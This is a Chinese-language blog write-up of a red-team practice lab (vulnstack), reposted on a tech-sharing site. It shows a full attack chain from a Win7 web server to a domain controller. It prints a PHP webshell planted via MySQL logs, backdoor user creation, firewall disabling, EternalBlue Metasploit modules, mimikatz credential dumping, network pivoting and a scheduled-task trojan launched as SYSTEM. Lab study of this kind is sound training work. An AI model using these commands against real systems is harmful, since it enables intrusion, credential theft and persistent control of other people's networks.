标签:CK use set 端口 win7 192.168 ATT 红队 smb
写在前面的话
第一次尝试这种渗透靶场,还是在考试的三天中完成的,会接着进行其他的靶场(真是又菜又爱玩)
靶场地址:vulunstack
靶场搭建
Win7:密码: cys121`
外网192.168.47.132
内网 192.168.52.143
Win2008 密码:cys121`
内网 192.168.52.138
Win2003 密码:cys121`
内网 192.168.52.141
经过互相ping 内网三台机器可以互相ping通
Kali
外网 192.168.47.129
Kali(攻击机):外网 192.168.47.129
Win7(VM1):外网192.168.47.132 内网 192.168.52.143
Win2003(VM2) 域成员 192.168.52.141
Win2008(VM3) 域控 192.168.52.138
启动win7 phpstudy:
信息搜集
访问win7 php网站服务:
看到是php探针
Nmap 扫描开启了哪些端口:开启80端口
御剑扫描:发现phpmyadmin
dirsearch 也扫到一些
这里我没有扫到/yxcms/
这里可以利用网页的漏洞登录进后台进行文件编辑写入一句话getshell,这里就不说了
漏洞利用getshell
后台Getshell
进入/phpmyadmin
默认账号密码登陆成功:root root
尝试一下用 into outfile执行写入一句话getshell失败:
select "<?php eval($_POST[shell]);?>" into out file '/tmp/cyshack.php'
原因是写入功能未开启
尝试开启全局日志利用getshell
show variables like '%general%';
可以看到功能是关闭的且回显日志文件的路径
尝试开启并更改路径
set global general_log='on'
set global general_log_file='C:/phpStudy/www/cyshack.php'
写入一句话:
select "<?php eval($_POST[shell]);?>"
蚁剑链接:
成功getshell:
蚁剑利用
蚁剑查询身份:
添加用户:
net user cys hongrisec@2020 /add
(增加一个名为cys 密码为hongrisec@2020的用户名)
查看cys用户:
关闭防火墙:
netsh advfirewall set allprofiles state off
控制win7
获取权限
有两种方法:
木马反弹shell
SMB ms17_010
Msvemon生成木马
蚁剑上传木马
运行木马:
在kali设置监听即可
尝试ms17_010:
攻击 拿下win7权限:
提升权限
Sysinfo
Getuid (发现是administor权限)
Getsystem (获取system权限)
主机密码收集
Hashdump:看到用户的密码哈希值
Mimikatz:抓取明文密码
ps:mimikatz模块已经合并为kiwi模块
Metasploit-进阶用户密码与mimikatz模块kiwi模块
load_kiwi:
creds_all 命令直接获取密码:
远程桌面连接
Nmap未开启3389
meterpreter尝试开启3389:
run post/windows/manage/enable_rdp
尝试远程登录:
rdesktop -g 1440x900 -r disk:LinuxxDisk=/root/Downloads -u STU1 -p "密码" 192.168.47.132
内网搜集
ipconfig看到另外一个ip:
应该是内网网段
使用 ipconfig /all 查看 DNS 服务器:
发现 DNS 服务器名为 god.org
查看域信息:net view
查看主域信息:net view /domain
网上很多搜集手段,不在说了
添加路由,挂socks4a代理
横向渗透前,先将该web服务器配置为代理服务器当作跳板机。
添加路由
查看路由信息,添加路由到目标环境网络
目的是为了使得MSF能够通过Win7路由转发访问,使得msf命令能够通过win7 访问到 内网
Run get_local_subnets //可以用此命令查看目标机器所在内网网端信息与公网网端信息。
添加内网路由 使得msf6能通过win7路由转发访问内网192.168.52.0/24网段
run autoroute -s 192.168.52.0/24
这样,我们就可以通过msf 进入.52网段
马上扫描52网段:
run post/windows/gather/arp_scanner RHOSTS=192.168.52.0/24
扫描存活主机:
use auxiliary/scanner/netbios/nbname
内网端口信息:
use auxiliary/scanner/portscan/tcp
挂socks4a代理
挂代理是为了让其他工具能够通过win7 ,去访问192.168.52.0/24 网段
配置msf代理:
use auxiliary/server/socks_proxy
run之后会出现 starting... ,jobs可以查看当前代理任务,如果出现stoping...,可以尝试更改 SRVHOST配置 或者 修改如下配置文件
如果proxychains配置终端代理出现问题 修改一下文件
切记打开的是/etc/proxychains4.config
设置代理成功后 使用其他工具时需要添加proxychains:
Nmap扫描 192.168.52.141
proxychains nmap -Pn -sT 192.168.52.141 // -Pn -sT 不可少
渗透win2003(远程登录)
信息收集
扫描主机版本
use auxiliary/scanner/smb/smb_version
扫描192.168.52.141系统版本信息 是win2003
nmap 扫描端口等
尝试攻击
由nmap看到开放445端口
尝试永恒之蓝攻击win2003
use exploit/windows/smb/ms17_010_psexec //windows 2003 的攻击模块
set payload windows/meterpreter/bind_tcp
可以看到能获取权限但是win7直接断开连接
再次尝试:
依旧是:(经常性断掉win7 控制权,导致断一次我就要重新打一次)
我去!!!终于知道哪里错了
得到win7权限之后 一定要首先看一下自己的权限
Getuid
Getsystem
run post/windows/manage/enable_rdp(关闭防火墙)
再打一次:成了但是其他命令无法执行
尝试ms08-067没打下来
可以执行一些系统权限的命令,添加管理员用户尝试3389登录
use auxiliary/admin/smb/ms17_010_command
因为开了445端口:
use auxiliary/admin/smb/ms17_010_command
show options
set rhosts 192.168.52.141
set command net user cyshack @cys121@ /add #添加用户
run #成功执行
set command net localgroup administrators cyshack /add #管理员权限
run #成功执行
set command 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f' //开启3389端口
run #成功执行
系统权限命令:
cyshack用户:
3389:
然后使用proxychains连接他的3389(cyshack用户登录)
Proxychains rdesktop 192.168.52.141
走向win2008(C盘共享传马)
信息收集
扫描版本信息:
use auxiliary/scanner/smb/smb_version
Nmap:开启了135 和445 , 3389未开启
永恒之蓝和135端口漏洞都失败 放弃漏洞
使用命令:可添加用户
use auxiliary/admin/smb/ms17_010_command
另辟蹊径
win7中得到域内用户密码:
kiwi_cmd sekurlsa::logonpasswords
这里利用 win7 向域控传一个msf马,并让域控中的马定时开启然后我们只需要在kali设置监听即可
生成马:(设置反弹shell到win7的9999端口)
先win7连接域控的c盘共享
(shell) net use \\192.168.52.138\c$ "cys121`" /user:"administrator"
查看域控的c盘资源:
(shell) dir \\192.168.52.138\c$
说明成功
上传msf马到win7:
(win7 meterpreter) upload
将win7的马共享给域控:
(shell) copy c:\Windows\System32\cyshoumen.exe \\192.168.52.138\c$
看到域控:
设置一个任务计划,定时启动木马:
schtasks /create /tn "test" /tr C:\cyshoumen.exe /sc once /st 22:14 /S 192.168.52.138 /RU System /u administrator /p "cys121`"
设置监听:此时应该监听win7的9999端口
到时间点之后会反弹shell:
拿下
参考
标签:CK,use,set,端口,win7,192.168,ATT,红队,smb 来源: https://blog.csdn.net/qq_53263789/article/details/115091561
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。